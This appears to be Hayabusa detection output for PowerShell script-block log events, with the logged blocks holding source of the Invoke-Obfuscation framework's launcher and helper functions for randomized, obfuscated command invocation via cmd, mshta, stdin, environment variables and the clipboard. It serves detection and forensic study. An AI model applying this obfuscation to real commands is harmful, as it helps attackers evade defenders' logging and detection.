$CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. 
$CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. 
$RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. 
If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. 
$CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. 
$ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. 
Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. 
$PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. 
.EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. 
$CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. 
$InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. 
This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. 
# 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. 
This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. 
